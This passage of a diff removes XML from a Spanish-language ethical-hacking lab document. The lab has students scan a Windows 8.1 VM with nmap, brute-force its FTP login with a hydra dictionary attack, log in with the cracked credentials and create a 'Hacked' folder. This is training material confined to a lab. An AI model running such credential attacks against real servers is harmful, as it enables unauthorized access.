-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>b.</w:t>
-        <w:tab/>
-        <w:t>Realizar un ataque de diccionario usando hydra.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Entorno de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Para realizar el laboratorio necesitas:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Una computadora ejecutando Windows Server 2012</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Windows 8.1 ejecutándose como una máquina virtual.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Kali Linux corriendo como una máquina virtual</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Descripción general de los ataques del diccionario</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Un diccionario / lista de palabras contiene miles de palabras utilizadas por las herramientas de descifrado de contraseñas en un intento de ingresar en un sistema protegido por contraseña. Los ataques de diccionario a menudo tienen éxito porque muchos usuarios insisten en usar palabras comunes como contraseñas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Tareas de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>1.</w:t>
-        <w:tab/>
-        <w:t>Antes de comenzar esta práctica de laboratorio, inicie la máquina virtual de Windows 8.1 desde el Administrador de Hyper-V y por mucho tiempo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-        <w:tab/>
-        <w:t>Inicie la máquina virtual Kali Linux desde el Administrador de Hyper-V e inicie sesión.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>3.</w:t>
-        <w:tab/>
-        <w:t>Haga doble clic en la computadora en el escritorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>4.</w:t>
-        <w:tab/>
-        <w:t>Aparece la ventana de la computadora. Haz clic en ir desde la barra de menú y selecciona la ubicación.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>5.</w:t>
-        <w:tab/>
-        <w:t>Ingrese smb: // [dirección IP del servidor de Windows 2012] en el campo ir a.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: En esta práctica de laboratorio, la dirección IP del servidor de Windows 2012 es 10.0.0.2 Esta dirección IP puede variar en su entorno de laboratorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: Si se le solicita que ingrese las credenciales, escriba esas credenciales, haga clic en Recordar para siempre y haga clic en Conectar.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Si no puede conectarse al servidor, inicie un terminal de línea de comandos, ejecute el comando iptables -flush y luego vuelva a realizar el Paso 5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>6.</w:t>
-        <w:tab/>
-        <w:t>Aparece una ventana que muestra la unidad de red compartida CEH-Tools.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>7.</w:t>
-        <w:tab/>
-        <w:t>Vaya a CEH-Tools -&gt; CEHv9 Module 11 Hacking Webserver y copie la carpeta de lista de palabras</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>8.</w:t>
-        <w:tab/>
-        <w:t>Vaya a Escritorio, haga clic en Lugares en la barra de menú y seleccione Carpeta de inicio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>9.</w:t>
-        <w:tab/>
-        <w:t>Pega el directorio de listas de palabras en esta ubicación</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>10.</w:t>
-        <w:tab/>
-        <w:t>Realice un escaneo de nmap en la máquina de destino (Windows 8.1) para verificar si el puerto FTP está abierto.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>11.</w:t>
-        <w:tab/>
-        <w:t>Inicie un terminal de línea de comando e ingrese nmap -p 21 [dirección IP de Windows 8.1]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: En esta práctica de laboratorio, la dirección IP de Windows 8.1 es 10.0.0.4. Esta dirección puede variar en su entorno de laboratorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>12.</w:t>
-        <w:tab/>
-        <w:t>Observe que el puerto 21 está abierto en Windows 8.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>13.</w:t>
-        <w:tab/>
-        <w:t>Compruebe si un servidor FTP está alojado en la máquina de Windows 8.1.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>14.</w:t>
-        <w:tab/>
-        <w:t>Introduzca ftp [dirección ip de windows 8.1]. Se le pedirá que ingrese las credenciales de usuario, lo que implica que un servidor FTP está alojado en la máquina y requiere credenciales.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: La dirección IP de Windows 8.1 en este laboratorio es 10.0.0.4. Esta dirección IP puede variar en su entorno de laboratorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>15.</w:t>
-        <w:tab/>
-        <w:t>Intente ingresar nombres de usuario y contraseñas al azar para intentar obtener acceso ftp.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Nota: la contraseña que ingrese no será visible.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>16.</w:t>
-        <w:tab/>
-        <w:t>Realizar un ataque en el servidor FTP en un intento de obtener acceso a él.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>17.</w:t>
-        <w:tab/>
-        <w:t>Este laboratorio utiliza hydra.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>18.</w:t>
-        <w:tab/>
-        <w:t>Abre un terminal de línea de comandos</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>19.</w:t>
-        <w:tab/>
-        <w:t>Ingrese hydra -L / root / Wordlists / Usernames.txt -P /root/Wordlists/Passwords.txt ftp: // [dirección IP de Windows 8.1]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Nota: La dirección IP de Windows 8.1 en este laboratorio es 10.0.0.4. Esta dirección IP puede variar en su entorno de laboratorio.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>20.</w:t>
-        <w:tab/>
-        <w:t>Hydra comienza a probar varias combinaciones de nombres de usuario y contraseñas (se presenta en los archivos Usernames.txt y Passwords.txt) en el servidor ftp, y comienza a mostrar los nombres de usuario y las contraseñas resquebrajados, como se muestra en la siguiente captura de pantalla.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>21.</w:t>
-        <w:tab/>
-        <w:t>Al completar el craqueo de la contraseña, las credenciales descifradas aparecen como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>22.</w:t>
-        <w:tab/>
-        <w:t>Intente iniciar sesión en el servidor ftp utilizando una de las combinaciones de nombre de usuario y contraseña que se han resquebrajado. En el laboratorio, use las credenciales de Martin para obtener acceso al servidor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>23.</w:t>
-        <w:tab/>
-        <w:t>Abra un terminal de línea de comando e ingrese ftp [Dirección IP de Windows 8.1]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>24.</w:t>
-        <w:tab/>
-        <w:t>Ingrese las credenciales de usuario de Martin (Martin / apple) para verificar si puede iniciar sesión correctamente en el servidor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>25.</w:t>
-        <w:tab/>
-        <w:t>Al ingresar las credenciales, podrá iniciar sesión correctamente en el servidor. Aparece un terminal ftp como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>26.</w:t>
-        <w:tab/>
-        <w:t>Acceda de forma remota al servidor FTP alojado en la máquina con Windows 8.1.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>27.</w:t>
-        <w:tab/>
-        <w:t>Ingrese mkdir Hacked para crear un directorio llamado Hacked a través del terminal ftp.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>28.</w:t>
-        <w:tab/>
-        <w:t>Cambie a la máquina virtual de Windows 8.1 y navegue a C: \ FTP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>29.</w:t>
-        <w:tab/>
-        <w:t>vea el directorio llamado Hackeado, como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>30.</w:t>
-        <w:tab/>
-        <w:t>Ha obtenido con éxito el acceso remoto al servidor FTP al obtener las credenciales</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>31.</w:t>
-        <w:tab/>
-        <w:t>Vuelva a la máquina virtual Kali Linux.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>32.</w:t>
-        <w:tab/>
-        <w:t>Ingrese ayuda para ver todos los demás comandos que puede usar a través del terminal FTP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>33.</w:t>
-        <w:tab/>
-        <w:t>Al completar el laboratorio, ingrese quit para salir del terminal FTP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>34.</w:t>
-        <w:tab/>
-        <w:t>Has obtenido acceso al servidor FTP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Tareas de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
